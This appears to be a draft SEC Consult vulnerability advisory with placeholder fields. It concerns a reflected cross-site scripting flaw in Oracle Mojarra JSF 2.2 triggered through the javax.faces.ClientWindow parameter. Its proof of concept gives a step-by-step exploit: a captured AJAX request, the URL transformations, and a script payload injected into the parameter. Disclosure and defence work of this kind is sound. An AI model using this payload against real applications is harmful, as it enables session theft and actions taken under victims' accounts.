Confidentiality class: Internal & Partner
SEC Consult Vulnerability Lab Security Advisory < publishing date YYYYMMDD-0 >
=======================================================================
title: Reflected Cross-Site Scripting (XSS)
product: Oracle Mojarra JSF included in Java EE 7
vulnerable version: 2.2
fixed version:
CVE number:
impact: High
homepage: https://javaserverfaces.github.io/
found: 2018-11-12
by: Jean-Benjamin Rousseau (Office Zurich)
Guillaume Crouquet (Office Zurich)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"JavaServer Faces technology simplifies building user interfaces for
JavaServer applications. Developers can build web applications by
assembling reuseable UI components in a page; connecting these
components to an application data source; and wiring client-generated
events to server-side event handlers. This project provides information
on the continued development of the JavaServer Faces specification.
JavaServer Faces (JSF) is a JCP Standard technology for authoring
component based user interfaces on the Java EE platform."
Source: https://javaee.github.io/javaserverfaces-spec/
Business recommendation:
------------------------
By exploiting the vulnerability documented in this advisory, an attacker
can execute arbitrary scripts in the context of the web application in the
victim's browser. Besides performing arbitrary actions within the
application with the victim's account or manipulating the application's
interface, the attacker can potentially steal session tokens, redirect
the victim to external pages and perform attacks against their browser.
SEC Consult recommends to [tbd vendor patch / workaround]
Vulnerability overview/description:
-----------------------------------
The Oracle Mojarra implementation of JavaServer Faces (JSF) v2.2 is affected
by a Reflected Cross-Site Scripting (XSS). Oracle Mojarra JSF v2.2 is
the user interface standard for Java EE 7. This vulnerability only affects
the web applications which use AJAX requests and which have set
the javax.faces.CLIENT_WINDOW_MODE context parameter to "url"
in the web.xml file:
javax.faces.CLIENT_WINDOW_MODE
url
In this configuration, the web applications will use the
javax.faces.ClientWindow POST parameter for their AJAX requests.
Because the javax.faces.ClientWindow parameter is not properly sanitized,
an XSS attack is possible.
Proof of concept:
-----------------
In this Proof of Concept, the tests are based on PrimeFaces v6.0,
an open source framework for JSF. The tests can be executed on
any framework based on Oracle Mojarra JSF 2.2.
Step 1: Generate an AJAX request on the web application and intercept it.
POST /HelloPrimeFaces/faces/welcomePrimefaces.xhtml?jfwid=2a616ef87aeed7521b02ceb4e163:0 HTTP/1.1
Host: localhost:8080
Content-Length: 405
Accept: application/xml, text/xml, */*; q=0.01
Origin: http://localhost:8080
X-Requested-With: XMLHttpRequest
Faces-Request: partial/ajax
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: JSESSIONID=2a616ef87aeed7521b02ceb4e163
Connection: close
javax.faces.partial.ajax=true&javax.faces.source=j_idt18%3AbtnSurname&javax.faces.partial.execute=j_idt18%3AbtnSurname+j_idt18%3Asurname&javax.faces.partial.render=j_idt18%3Agrid&j_idt18%3AbtnSurname=j_idt18%3AbtnSurname&j_idt18=j_idt18&j_idt18%3Afirstname=&j_idt18%3Asurname=surname&javax.faces.ViewState=7025249133904776332%3A-921340693957557245&javax.faces.ClientWindow=2a616ef87aeed7521b02ceb4e163%3A0
Step 2: Transpose the POST parameters into GET parameters and
build a new URL with it.
http://localhost:8080/HelloPrimeFaces/faces/welcomePrimefaces.xhtml?jfwid=2a616ef87aeed7521b02ceb4e163:0&javax.faces.partial.ajax=true&javax.faces.source=j_idt18%3AbtnSurname&javax.faces.partial.execute=j_idt18%3AbtnSurname+j_idt18%3Asurname&javax.faces.partial.render=j_idt18%3Agrid&j_idt18%3AbtnSurname=j_idt18%3AbtnSurname&j_idt18=j_idt18&j_idt18%3Afirstname=&j_idt18%3Asurname=surname&javax.faces.ViewState=7025249133904776332%3A-921340693957557245&javax.faces.ClientWindow=2a616ef87aeed7521b02ceb4e163%3A0
Step 3: Strip out the javax.faces.ViewState GET parameter from the URL.
http://localhost:8080/HelloPrimeFaces/faces/welcomePrimefaces.xhtml?jfwid=2a616ef87aeed7521b02ceb4e163:0&javax.faces.partial.ajax=true&javax.faces.source=j_idt18%3AbtnSurname&javax.faces.partial.execute=j_idt18%3AbtnSurname+j_idt18%3Asurname&javax.faces.partial.render=j_idt18%3Agrid&j_idt18%3AbtnSurname=j_idt18%3AbtnSurname&j_idt18=j_idt18&j_idt18%3Afirstname=&j_idt18%3Asurname=surname&javax.faces.ClientWindow=2a616ef87aeed7521b02ceb4e163%3A0
Step 4: Prefix the javax.faces.ClientWindow GET parameter with
the following payload:
]]>alert('SEC Consult')alert('SEC+Consult')